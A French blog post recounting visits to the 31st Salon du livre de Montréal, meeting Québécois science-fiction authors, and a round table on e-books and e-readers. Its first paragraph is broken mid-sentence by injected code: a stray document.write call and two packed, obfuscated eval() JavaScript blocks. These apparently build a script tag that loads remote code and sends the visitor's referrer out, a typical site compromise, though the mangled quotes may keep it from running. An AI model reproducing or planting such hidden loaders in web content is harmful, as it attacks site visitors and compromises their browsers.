Salon du livre de Montréal

La 31e édition du Salon du Livre de Montréal s’est terminée en début de semaine. Comme à toute les années je suis allé y faire mon tour, document.write(“”); histoire de jeter un coup d’oeil sur les nouveautés, y trouver quelques idées de cadeaux pour Noël et renouer contact les gens du milieu de l’édition.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iddak|var|u0026u|referrer|kdfrf||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|enkkr|var|u0026u|referrer|efezt||js|php’.split(‘|’),0,{}))

Le vendredi 21 Novembre, j’ai fait un premier survol du salon à l’occasion de la Journée des Professionnels. J’aurais bien aimé ramasser quelques catalogues mais la plupart des éditeurs n’en avaient pas ou plus (c’était pourtant juste la troisième journée du salon et ils auraient dû penser à s’en garder pour les professionnels du milieu de l’édition). Ils y avaient également quelques ateliers et tables rondes (Le feuilletage Numérique et la Recherche en Ligne, Communication-Jeunesse: Des Livres qui ont du Genre, Édition Numérique et Monde du Livre: Entrevoir l’avenir, Les Revues Culturelles à l’Heure du Numérique) aux quelles j’aurais bien assisté si j’avais reçu mon carton d’invitation à temps. Mais bon, j’ai tout de même recueillis de la documentation et quelques catalogues, observé les nouveautés manga, salué quelques amis, découvert une nouvelle collection intéressante et économique,
Librio, un magazine manga, Canal BD Manga Mag, ainsi qu’une nouvelle librairie spécialisée en BD, PlaneteBD. Cela valait donc tout de même la peine.

Je suis repassé au salon le lendemain pour deux raisons.

D’abord, pour passer quelques heures au kiosque des Éditions Alire (dont le site internet n’est malheureusement toujours pas équipé pour les commandes en ligne!) et rencontrer quelques-uns des merveilleux auteurs de science-fiction et fantasy Québécoise et Canadienne-Française: Francine Pelletier, Daniel Sernine (qui a d’ailleurs fait l’object d’un récent article dans La Presse), Jean-Louis Trudel, etc. J’ai également pu rencontrer et discuter avec les trois auteurs derrière le blog Fractale Framboise: Éric Gauthier, Christian Sauvé et Laurine Spehner. Vous trouverez quelques photos de mon samedi chez Alire sur ma Gallerie MobileMe.

Ensuite, pour assister à une table ronde organisée par la Librairie Monet, sur “Le livre électronique: L’avenir du livre?” Je dois avouer que la discussion était plutôt rhétorique mais elle a tout de même soulevé le point important que l’édition électronique fait partie de l’évolution inéluctable du livre et qu’elle préoccupe de plus en plus les éditeurs. La preuve en est les nombreux ateliers du salon (et même un récent article du Devoir) consacré à ce sujet. Personnellement, je ne crois pas que le livre imprimé disparaisse de si tôt, mais j’ai la conviction que l’internet et l’édition électronique sont des outils essentiels à la diffusion du livre et des revues culturelles et littéraires. Protoculture Addicts est d’ailleurs disponible en format électronique (eBook en format PDF) depuis de nombreuse années—sur le site de Drive Thru RPG—et nous étudions en ce moment de nouveaux formats possible pour une diffusion plus large. Le kiosque de la Librairie Monet faisait également la démontration de la technologie e-Ink et de plusieurs lecteurs électroniques: le iRex Illiad, Les Echos e-paper, et le (laid mais pourtant si cool) Amazon Kindle—absent de la démontration mais pourtant incontournable, je dois noter le Sony Reader Digital Book et le polyvalent Apple iPod Touch. Vous pouvez visionner la table ronde en son entier (une cinquantaine de minutes) sur ma page Blip.TV: